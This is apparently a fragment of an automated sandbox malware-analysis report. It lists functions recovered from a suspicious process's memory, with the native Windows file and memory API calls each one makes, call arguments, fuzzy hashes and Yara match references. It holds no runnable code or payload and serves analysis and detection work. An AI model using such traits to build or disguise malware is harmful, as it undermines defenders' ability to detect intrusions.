                                                                                                                    • Opcode ID: d6f00bbf45da1e297f82529d7d951ab67a610424b36b51352bce5b31f8991bc7
                                                                                                                    • Instruction ID: 299a661b0c08f1b41a847beee6250ea985a59ab2db2606877b8a957dd6d84e8f
                                                                                                                    • Opcode Fuzzy Hash: d6f00bbf45da1e297f82529d7d951ab67a610424b36b51352bce5b31f8991bc7
                                                                                                                    • Instruction Fuzzy Hash: 4B11D0B2204208AFDB08DF88DC95DEB73AEEF8C754F108648BA0997240D630E811CBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0294A360 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 291 294a360-294a3b1 call 294af60 NtCreateFile
                                                                                                                    APIs
                                                                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,02944BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02944BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0294A3AD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2930000_help.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID: .z`
                                                                                                                    • API String ID: 823142352-1441809116
                                                                                                                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                    • Instruction ID: 56a6081bdf3576a973fe6e14a4080b7ae6f92b56df594e4d2af5729109ef4708
                                                                                                                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                    • Instruction Fuzzy Hash: 4DF0B2B2200208AFCB08CF88DC94EEB77ADAF8C754F158248BA0D97240C630E8118BA4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0294A40A Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • NtReadFile.NTDLL(02944D72,5EB65239,FFFFFFFF,02944A31,?,?,02944D72,?,02944A31,FFFFFFFF,5EB65239,02944D72,?,00000000), ref: 0294A455
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2930000_help.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FileRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2738559852-0
                                                                                                                    • Opcode ID: 2da8bce052b574b1b82a7edc5e34550d658a61247c8d33e31bcee32fb904a413
                                                                                                                    • Instruction ID: d3921db827d0ffdfcf76d467598ec5ef20ad94a0b2b85de7bbd7815c4fa724c4
                                                                                                                    • Opcode Fuzzy Hash: 2da8bce052b574b1b82a7edc5e34550d658a61247c8d33e31bcee32fb904a413
                                                                                                                    • Instruction Fuzzy Hash: 31F0E2B2200108AFDB18CF88DC80EEB77A9FF8C354F158268BA1D97240D630E811CBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0294A410 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • NtReadFile.NTDLL(02944D72,5EB65239,FFFFFFFF,02944A31,?,?,02944D72,?,02944A31,FFFFFFFF,5EB65239,02944D72,?,00000000), ref: 0294A455
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2930000_help.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FileRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2738559852-0
                                                                                                                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                    • Instruction ID: b11ae3ec0c618f01cad5a06c4f40abdf126860004c0bfc984c02d29c8e07b6d4
                                                                                                                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                    • Instruction Fuzzy Hash: E2F0B7B2200208AFDB14DF89DC90EEB77ADEF8C754F158258BE1D97241DA30E811CBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0294A53A Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02932D11,00002000,00003000,00000004), ref: 0294A579
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2930000_help.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2167126740-0
                                                                                                                    • Opcode ID: f2271e41b7b9ffb6d89243516a41a7a07b3e47e3204ddefbd352b06ebc613523
                                                                                                                    • Instruction ID: b7b139379e80fd9e4d569f1a1af29f0212ef997342ea7ad4271f9acdd6b80b14
                                                                                                                    • Opcode Fuzzy Hash: f2271e41b7b9ffb6d89243516a41a7a07b3e47e3204ddefbd352b06ebc613523
                                                                                                                    • Instruction Fuzzy Hash: D5F0F8B6200208AFDB14DF88DC91EA777A9EF88654F158258FE1997341C630E911CBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0294A540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02932D11,00002000,00003000,00000004), ref: 0294A579
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2930000_help.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2167126740-0
                                                                                                                    • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                    • Instruction ID: 8c99920797e77c8459640bf49d2c8ae639af4d846239d6437bef407aa5b1bf38
                                                                                                                    • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                    • Instruction Fuzzy Hash: 9AF015B2200208AFDB14DF89CC80EAB77ADEF88754F118258BE0897241C630F811CBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0294A490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • NtClose.NTDLL(02944D50,?,?,02944D50,00000000,FFFFFFFF), ref: 0294A4B5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2930000_help.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Close
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3535843008-0
                                                                                                                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                    • Instruction ID: 01907df9858f1e7b889a8d8e51b150c44f8c69bad81a98b85285ab87adb9b858
                                                                                                                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                    • Instruction Fuzzy Hash: 8CD012762402146BD710EB98CC45E97775DEF44750F154595BA185B241C530F50086E0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03332B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_32c0000_help.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 46bf20871dd7572c082cf4c53714c9cf76c705da6d41ce1c508090c0b8ce1673
                                                                                                                    • Instruction ID: 9260a7d36bc8ce609e86b1cee45eb3ca78627ad01f8e0f4729499ee3645ec116
                                                                                                                    • Opcode Fuzzy Hash: 46bf20871dd7572c082cf4c53714c9cf76c705da6d41ce1c508090c0b8ce1673
                                                                                                                    • Instruction Fuzzy Hash: D6900265212404034105B25C4454616404A87E0201B55C021E1014990DC66699916225
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03332BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_32c0000_help.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: f169c7bffe9b386688decf4b932a224805c898a812c758c4db94a15116031117
                                                                                                                    • Instruction ID: 241bbcbc0e9937020b7951a6051ab05881769c41d3d9b5239fd510accca80b72
                                                                                                                    • Opcode Fuzzy Hash: f169c7bffe9b386688decf4b932a224805c898a812c758c4db94a15116031117
                                                                                                                    • Instruction Fuzzy Hash: 4090023521140C02D180B25C444464A004587D1301F95C015A0025A54DCB569B5977A1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03332BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_32c0000_help.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: e34db20aff5167e97e53a94d5558b9edd49cbb7ee45073fc0842bb63f5fbcac1
                                                                                                                    • Instruction ID: 2744bd4d127fc21bfef9d201d38013a3be4622d8f04bd9f6af49cf4b45ef4991
                                                                                                                    • Opcode Fuzzy Hash: e34db20aff5167e97e53a94d5558b9edd49cbb7ee45073fc0842bb63f5fbcac1
                                                                                                                    • Instruction Fuzzy Hash: 6790023521544C42D140B25C4444A46005587D0305F55C011A0064A94D97669E55B761
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03332AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_32c0000_help.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 212d6b461faf35bdc15072fab0f758696f511ad205704cc878244e98f6d23d85
                                                                                                                    • Instruction ID: e9af577363489a09a2b834c87c36b63b1b476bc8fd01f20221d567f152c120b0
                                                                                                                    • Opcode Fuzzy Hash: 212d6b461faf35bdc15072fab0f758696f511ad205704cc878244e98f6d23d85
                                                                                                                    • Instruction Fuzzy Hash: 65900229221404030105F65C0744507008687D5351355C021F1015950CD76299615221
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03332F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_32c0000_help.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 2a1e793b9999efee3f185f60385dc9b847caa23a2ead7cb45fe693154d2b53e8
                                                                                                                    • Instruction ID: 3caf0f9b5999ff0d4cc94d7a55096ab91a8b935aa8d3da760db709e99092dcfd
                                                                                                                    • Opcode Fuzzy Hash: 2a1e793b9999efee3f185f60385dc9b847caa23a2ead7cb45fe693154d2b53e8
                                                                                                                    • Instruction Fuzzy Hash: 0090026535140842D100B25C4454B060045C7E1301F55C015E1064954D875ADD526226
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03332FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_32c0000_help.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 5ba7ed1f9579d842fad847237e9f33709fb2fb0f0f0c7b31a89d497bbc4187ec
                                                                                                                    • Instruction ID: c3d651e7c21275e3315baad6a51a32a8b3c46c09a70babf70d79a3f37900035f
                                                                                                                    • Opcode Fuzzy Hash: 5ba7ed1f9579d842fad847237e9f33709fb2fb0f0f0c7b31a89d497bbc4187ec
                                                                                                                    • Instruction Fuzzy Hash: A6900225221C0442D200B66C4C54B07004587D0303F55C115A0154954CCA5699615621
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03332EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_32c0000_help.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 4137cb60637f6cb23047c0d47fafc99e134406b312862c712f54c3d8b04fc589
                                                                                                                    • Instruction ID: 1c6d934a8b5ca88d521e5190b436de8fce7045329bce459d5d025e40a4c11d83
                                                                                                                    • Opcode Fuzzy Hash: 4137cb60637f6cb23047c0d47fafc99e134406b312862c712f54c3d8b04fc589
                                                                                                                    • Instruction Fuzzy Hash: 6D90027521140802D140B25C4444746004587D0301F55C011A5064954E879A9ED56765
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03332D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_32c0000_help.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 7fa479b5aec85cfcc33b071e1b583b1107197ef6a6cd770e340d38c0b8071681
                                                                                                                    • Instruction ID: d746dfb8cefabac896625e4ef4433a9dddd7135556106cb3ffa068331278bf98
                                                                                                                    • Opcode Fuzzy Hash: 7fa479b5aec85cfcc33b071e1b583b1107197ef6a6cd770e340d38c0b8071681
                                                                                                                    • Instruction Fuzzy Hash: 5790022D22340402D180B25C544860A004587D1202F95D415A0015958CCA5699695321
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03332DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_32c0000_help.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: df59af98784a4c766c8def77c139805e9555179141b61e1d13f1c192b5bc65d6
                                                                                                                    • Instruction ID: 6528e478dbdc285eb22d8ea868a80c39def04084f6073d6008d9600cd0ca80fd
                                                                                                                    • Opcode Fuzzy Hash: df59af98784a4c766c8def77c139805e9555179141b61e1d13f1c192b5bc65d6
                                                                                                                    • Instruction Fuzzy Hash: 9A90023521140813D111B25C4544707004987D0241F95C412A0424958D97979A52A221
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03332DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_32c0000_help.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 84c53db9b41f54e512e87067a08d449f6a27b88add5e0b3c51d674429efe3c98
                                                                                                                    • Instruction ID: dd3332ad315418af8c11a79c75eb1b05c6418fa1f31b880d851f88392af4dc30
                                                                                                                    • Opcode Fuzzy Hash: 84c53db9b41f54e512e87067a08d449f6a27b88add5e0b3c51d674429efe3c98
                                                                                                                    • Instruction Fuzzy Hash: AB900225252445525545F25C4444507404697E0241795C012A1414D50C8667A956D721
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03332C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_32c0000_help.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: b4091ada8d0694f1339ee0e531a77600af2f5ab84a8154f99ba068b346f11006
                                                                                                                    • Instruction ID: bb0ca8fb0fc657469d48a9069a2db1e27632c6d5da1782505a46115da5064f32
                                                                                                                    • Opcode Fuzzy Hash: b4091ada8d0694f1339ee0e531a77600af2f5ab84a8154f99ba068b346f11006
                                                                                                                    • Instruction Fuzzy Hash: 7090023521148C02D110B25C844474A004587D0301F59C411A4424A58D87D699917221
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03332C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_32c0000_help.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 2f727d93f5094f785958758df853457f80c8f0c4487a83afdb11efe9c9e388f6
                                                                                                                    • Instruction ID: 02041f060cbe247c477e3b6f03f828687e0f1e74e237b91ed778436ca2109722
                                                                                                                    • Opcode Fuzzy Hash: 2f727d93f5094f785958758df853457f80c8f0c4487a83afdb11efe9c9e388f6
                                                                                                                    • Instruction Fuzzy Hash: ED90023521140C42D100B25C4444B46004587E0301F55C016A0124A54D8756D9517621
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03332CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_32c0000_help.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: e0fcb7cc12aa957b0535c0decbd0fe837f5f113ee2065f77cd105e6a72968aba
                                                                                                                    • Instruction ID: 90cc4ac2cffb5c819732cb9376c7cd1091c2167ac18e72e3105bee0d05f7f1c6
                                                                                                                    • Opcode Fuzzy Hash: e0fcb7cc12aa957b0535c0decbd0fe837f5f113ee2065f77cd105e6a72968aba
                                                                                                                    • Instruction Fuzzy Hash: B190023521140802D100B69C5448646004587E0301F55D011A5024955EC7A699916231
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 033335C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_32c0000_help.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
